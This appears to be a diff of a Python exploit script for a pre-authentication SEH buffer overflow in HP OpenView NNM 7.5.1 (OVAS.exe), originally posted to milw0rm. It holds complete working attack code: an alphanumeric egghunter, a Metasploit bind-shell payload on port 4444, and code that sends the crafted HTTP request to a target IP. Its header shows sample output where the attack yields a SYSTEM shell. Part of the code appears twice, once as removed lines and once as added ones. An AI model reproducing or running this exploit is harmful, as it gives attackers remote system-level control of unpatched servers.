-"\x46\x46\x4b\x58\x43\x44\x42\x33\x4b\x38\x42\x54\x4e\x30\x4b\x48" -"\x42\x47\x4e\x51\x4d\x4a\x4b\x48\x42\x34\x4a\x50\x50\x35\x4a\x36" -"\x50\x38\x50\x54\x50\x50\x4e\x4e\x42\x35\x4f\x4f\x48\x4d\x48\x56" -"\x43\x55\x48\x56\x4a\x46\x43\x53\x44\x43\x4a\x36\x47\x57\x43\x57" -"\x44\x33\x4f\x35\x46\x55\x4f\x4f\x42\x4d\x4a\x56\x4b\x4c\x4d\x4e" -"\x4e\x4f\x4b\x53\x42\x55\x4f\x4f\x48\x4d\x4f\x45\x49\x38\x45\x4e" -"\x48\x56\x41\x38\x4d\x4e\x4a\x50\x44\x30\x45\x45\x4c\x46\x44\x30" -"\x4f\x4f\x42\x4d\x4a\x46\x49\x4d\x49\x50\x45\x4f\x4d\x4a\x47\x55" -"\x4f\x4f\x48\x4d\x43\x55\x43\x55\x43\x55\x43\x55\x43\x45\x43\x44" -"\x43\x35\x43\x54\x43\x55\x4f\x4f\x42\x4d\x48\x36\x4a\x46\x41\x31" -"\x4e\x55\x48\x46\x43\x55\x49\x58\x41\x4e\x45\x59\x4a\x56\x46\x4a" -"\x4c\x51\x42\x37\x47\x4c\x47\x35\x4f\x4f\x48\x4d\x4c\x56\x42\x51" -"\x41\x35\x45\x45\x4f\x4f\x42\x4d\x4a\x56\x46\x4a\x4d\x4a\x50\x32" -"\x49\x4e\x47\x35\x4f\x4f\x48\x4d\x43\x35\x45\x35\x4f\x4f\x42\x4d" -"\x4a\x56\x45\x4e\x49\x34\x48\x48\x49\x44\x47\x45\x4f\x4f\x48\x4d" -"\x42\x55\x46\x55\x46\x35\x45\x45\x4f\x4f\x42\x4d\x43\x59\x4a\x46" -"\x47\x4e\x49\x57\x48\x4c\x49\x37\x47\x55\x4f\x4f\x48\x4d\x45\x45" -"\x4f\x4f\x42\x4d\x48\x56\x4c\x56\x46\x56\x48\x46\x4a\x46\x43\x56" -"\x4d\x36\x49\x58\x45\x4e\x4c\x56\x42\x45\x49\x45\x49\x42\x4e\x4c" -"\x49\x38\x47\x4e\x4c\x36\x46\x44\x49\x38\x44\x4e\x41\x33\x42\x4c" -"\x43\x4f\x4c\x4a\x50\x4f\x44\x54\x4d\x52\x50\x4f\x44\x44\x4e\x32" -"\x43\x39\x4d\x38\x4c\x37\x4a\x43\x4b\x4a\x4b\x4a\x4b\x4a\x4a\x46" -"\x44\x57\x50\x4f\x43\x4b\x48\x41\x4f\x4f\x45\x57\x46\x44\x4f\x4f" -"\x48\x4d\x4b\x35\x47\x45\x44\x55\x41\x55\x41\x55\x41\x35\x4c\x56" -"\x41\x50\x41\x55\x41\x45\x45\x35\x41\x45\x4f\x4f\x42\x4d\x4a\x56" -"\x4d\x4a\x49\x4d\x45\x30\x50\x4c\x43\x35\x4f\x4f\x48\x4d\x4c\x36" -"\x4f\x4f\x4f\x4f\x47\x53\x4f\x4f\x42\x4d\x4b\x38\x47\x55\x4e\x4f" -"\x43\x48\x46\x4c\x46\x56\x4f\x4f\x48\x4d\x44\x55\x4f\x4f\x42\x4d" -"\x4a\x56\x4f\x4e\x50\x4c\x42\x4e\x42\x56\x43\x35\x4f\x4f\x48\x4d" -"\x4f\x4f\x42\x4d\x5a") - -# 0x6d356c6e pop pot ret somehwere in NNM 7.5.1 - -evilcrash = "\xeb"*1101 + "\x41\x41\x41\x41\x77\x21\x6e\x6c\x35\x6d" + "G"*32 +egghunter + "A"*100 + ":7510" - -buffer="GET http://" + evilcrash+ "/topology/homeBaseView HTTP/1.1\r\n" -buffer+="Content-Type: application/x-www-form-urlencoded\r\n" -buffer+="User-Agent: Mozilla/4.0 (Windows XP 5.1) Java/1.6.0_03\r\n" -buffer+="Content-Length: 1048580\r\n\r\n" -buffer+= bindshell - -print "[*] Sending evil HTTP request to NNMz, ph33r" -expl = socket.socket ( socket.AF_INET, socket.SOCK_STREAM ) -expl.connect(("192.168.1.111", 7510)) -expl.send(buffer) -expl.close() -print "[*] Egghunter working ..." -print "[*] Check payload results - may take up to a minute." - -# milw0rm.com [2008-04-02] +#!/usr/bin/python +################################################################################ +# HP OpenView NNM 7.5.1 OVAS.EXE Pre Authentication SEH Overflow +# Tested on Windows 2003 Server SP1. +# Coded by Mati Aharoni +# muts..at..offensive-security.com +# http://www.offensive-security.com/0day/hp-nnm-ov.py.txt +# [shameless plug] +# This vulnerability was found, analysed and exploited +# as part of a training module in "BackTrack to the Max". +# http://www.offensive-security.com/ilt.php +# [/shameless plug] +################################################################################# +# bt 0day# python hp-nnm-ov.py +# [*] HP NNM 7.5.1 OVAS.exe SEH PRE AUTH Overflow Exploit (0day) +# [*] http://www.offensive-security.com +# [*] Sending evil HTTP request to NNMz, ph33r +# [*] Egghunter working ... +# [*] Check payload results - may take up to a minute. +# bt 0day# nc -v 192.168.1.111 4444 +# (muts) [192.168.1.111] 4444 (krb524) open +# Microsoft Windows [Version 5.2.3790] +# (C) Copyright 1985-2003 Microsoft Corp. +# +# C:\>whoami +# whoami +# nt authority\system +# +# C:\> +# +################################################################################ +# Insane, "We own all those registers, but how the heck do we get EIP" method. +################################################################################ +# crash = "T"*1300 +# +################################################################################# +# Funky, "Lets make the stack happy and pray for EIP" overwrite method. +################################################################################# +# Case 1 - Stack not happy: +# crash = "T"*989 +# +# Case 2 - Stack happy, we own EIP - blessed by the angels above: +# 0x44442638 - Happy NNM address +# crash = "T"*941 +"\x38\x26\x44\x44"+"\x42\x42\x42\x42" +"T"*12 +"\x41\x41\x41\x41" + "T"*24+":7510"+"\x41\x41\x41\x41" + "B"*24+":7510" +# 12 bytes of nasty strict alphanum shellcode possibility @EBP +# +################################################################################ +# Unknown "wtf, these bytes are expanding" SEH method: +################################################################################ +# 0x6d356c6e - POP POP RET somewhere in NNM +# crash = "\xeb"*1100+"A"*9+"\x41\x41\x41\x41"+"A"*1900+":7510" +# +################################################################################ +# Final exploit crash SEH method: +################################################################################ +# crash = "\xeb"*1101 +"\x41\x41\x41\x41\x77\x21\x6e\x6c\x35\x6d" + "G"*32 + egghunter +"A"*100+":7510" +# +################################################################################ + +import socket +import os +import sys + +print "[*] HP NNM 7.5.1 OVAS.exe SEH Overflow Exploit (0day)" +print "[*] http://www.offensive-security.com" + +# Alphanumeric egghunter shellcode + restricted chars \x40\x3f\x3a\x2f - ph33r +# One egg to rule them all. + +egghunter=( +"%JMNU%521*TX-1MUU-1KUU-5QUUP\AA%J" +"MNU%521*-!UUU-!TUU-IoUmPAA%JMNU%5" +"21*-q!au-q!au-oGSePAA%JMNU%521*-D" +"A~X-D4~X-H3xTPAA%JMNU%521*-qz1E-1" +"z1E-oRHEPAA%JMNU%521*-3s1--331--^" +"TC1PAA%JMNU%521*-E1wE-E1GE-tEtFPA" +"A%JMNU%521*-R222-1111-nZJ2PAA%JMN" +"U%521*-1-wD-1-wD-8$GwP") + +alignstack="\x90"*34+"\x83\xc4\x03" + +# win32_bind - EXITFUNC=thread LPORT=4444 Size=709 Encoder=PexAlphaNum http://metasploit.com +# Spawned shell dies quickly as a result of a parent thread killing it. +# Best shellcodes are of the "instant" type, such as adduser, etc. + +bindshell=("T00WT00W" + alignstack + +"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49" +"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36" +"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34" +"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41" +"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4c\x56\x4b\x4e" +"\x4d\x34\x4a\x4e\x49\x4f\x4f\x4f\x4f\x4f\x4f\x4f\x42\x36\x4b\x48" +"\x4e\x46\x46\x32\x46\x42\x4b\x48\x45\x54\x4e\x33\x4b\x38\x4e\x37" +"\x45\x30\x4a\x37\x41\x30\x4f\x4e\x4b\x38\x4f\x54\x4a\x41\x4b\x48" +"\x4f\x35\x42\x32\x41\x50\x4b\x4e\x49\x34\x4b\x58\x46\x43\x4b\x58" +"\x41\x30\x50\x4e\x41\x33\x42\x4c\x49\x49\x4e\x4a\x46\x48\x42\x4c" +"\x46\x47\x47\x50\x41\x4c\x4c\x4c\x4d\x30\x41\x30\x44\x4c\x4b\x4e" +"\x46\x4f\x4b\x53\x46\x55\x46\x32\x4a\x32\x45\x37\x45\x4e\x4b\x48" +"\x4f\x35\x46\x52\x41\x30\x4b\x4e\x48\x46\x4b\x58\x4e\x30\x4b\x54" +"\x4b\x58\x4f\x35\x4e\x51\x41\x50\x4b\x4e\x43\x50\x4e\x32\x4b\x38" +"\x49\x58\x4e\x46\x46\x52\x4e\x31\x41\x56\x43\x4c\x41\x53\x4b\x4d" +"\x46\x46\x4b\x58\x43\x44\x42\x33\x4b\x38\x42\x54\x4e\x30\x4b\x48" +"\x42\x47\x4e\x51\x4d\x4a\x4b\x48\x42\x34\x4a\x50\x50\x35\x4a\x36" +"\x50\x38\x50\x54\x50\x50\x4e\x4e\x42\x35\x4f\x4f\x48\x4d\x48\x56" +"\x43\x55\x48\x56\x4a\x46\x43\x53\x44\x43\x4a\x36\x47\x57\x43\x57" +"\x44\x33\x4f\x35\x46\x55\x4f\x4f\x42\x4d\x4a\x56\x4b\x4c\x4d\x4e" +"\x4e\x4f\x4b\x53\x42\x55\x4f\x4f\x48\x4d\x4f\x45\x49\x38\x45\x4e" +"\x48\x56\x41\x38\x4d\x4e\x4a\x50\x44\x30\x45\x45\x4c\x46\x44\x30" +"\x4f\x4f\x42\x4d\x4a\x46\x49\x4d\x49\x50\x45\x4f\x4d\x4a\x47\x55" +"\x4f\x4f\x48\x4d\x43\x55\x43\x55\x43\x55\x43\x55\x43\x45\x43\x44" +"\x43\x35\x43\x54\x43\x55\x4f\x4f\x42\x4d\x48\x36\x4a\x46\x41\x31" +"\x4e\x55\x48\x46\x43\x55\x49\x58\x41\x4e\x45\x59\x4a\x56\x46\x4a" +"\x4c\x51\x42\x37\x47\x4c\x47\x35\x4f\x4f\x48\x4d\x4c\x56\x42\x51" +"\x41\x35\x45\x45\x4f\x4f\x42\x4d\x4a\x56\x46\x4a\x4d\x4a\x50\x32" +"\x49\x4e\x47\x35\x4f\x4f\x48\x4d\x43\x35\x45\x35\x4f\x4f\x42\x4d" +"\x4a\x56\x45\x4e\x49\x34\x48\x48\x49\x44\x47\x45\x4f\x4f\x48\x4d" +"\x42\x55\x46\x55\x46\x35\x45\x45\x4f\x4f\x42\x4d\x43\x59\x4a\x46" +"\x47\x4e\x49\x57\x48\x4c\x49\x37\x47\x55\x4f\x4f\x48\x4d\x45\x45" +"\x4f\x4f\x42\x4d\x48\x56\x4c\x56\x46\x56\x48\x46\x4a\x46\x43\x56" +"\x4d\x36\x49\x58\x45\x4e\x4c\x56\x42\x45\x49\x45\x49\x42\x4e\x4c" +"\x49\x38\x47\x4e\x4c\x36\x46\x44\x49\x38\x44\x4e\x41\x33\x42\x4c" +"\x43\x4f\x4c\x4a\x50\x4f\x44\x54\x4d\x52\x50\x4f\x44\x44\x4e\x32" +"\x43\x39\x4d\x38\x4c\x37\x4a\x43\x4b\x4a\x4b\x4a\x4b\x4a\x4a\x46" +"\x44\x57\x50\x4f\x43\x4b\x48\x41\x4f\x4f\x45\x57\x46\x44\x4f\x4f" +"\x48\x4d\x4b\x35\x47\x45\x44\x55\x41\x55\x41\x55\x41\x35\x4c\x56" +"\x41\x50\x41\x55\x41\x45\x45\x35\x41\x45\x4f\x4f\x42\x4d\x4a\x56" +"\x4d\x4a\x49\x4d\x45\x30\x50\x4c\x43\x35\x4f\x4f\x48\x4d\x4c\x36" +"\x4f\x4f\x4f\x4f\x47\x53\x4f\x4f\x42\x4d\x4b\x38\x47\x55\x4e\x4f" +"\x43\x48\x46\x4c\x46\x56\x4f\x4f\x48\x4d\x44\x55\x4f\x4f\x42\x4d" +"\x4a\x56\x4f\x4e\x50\x4c\x42\x4e\x42\x56\x43\x35\x4f\x4f\x48\x4d" +"\x4f\x4f\x42\x4d\x5a") + +# 0x6d356c6e pop pot ret somehwere in NNM 7.5.1 + +evilcrash = "\xeb"*1101 + "\x41\x41\x41\x41\x77\x21\x6e\x6c\x35\x6d" + "G"*32 +egghunter + "A"*100 + ":7510" + +buffer="GET http://" + evilcrash+ "/topology/homeBaseView HTTP/1.1\r\n" +buffer+="Content-Type: application/x-www-form-urlencoded\r\n" +buffer+="User-Agent: Mozilla/4.0 (Windows XP 5.1) Java/1.6.0_03\r\n" +buffer+="Content-Length: 1048580\r\n\r\n" +buffer+= bindshell + +print "[*] Sending evil HTTP request to NNMz, ph33r" +expl = socket.socket ( socket.AF_INET, socket.SOCK_STREAM ) +expl.connect(("192.168.1.111", 7510)) +expl.send(buffer) +expl.close() +print "[*] Egghunter working ..." +print "[*] Check payload results - may take up to a minute." + +# milw0rm.com [2008-04-02]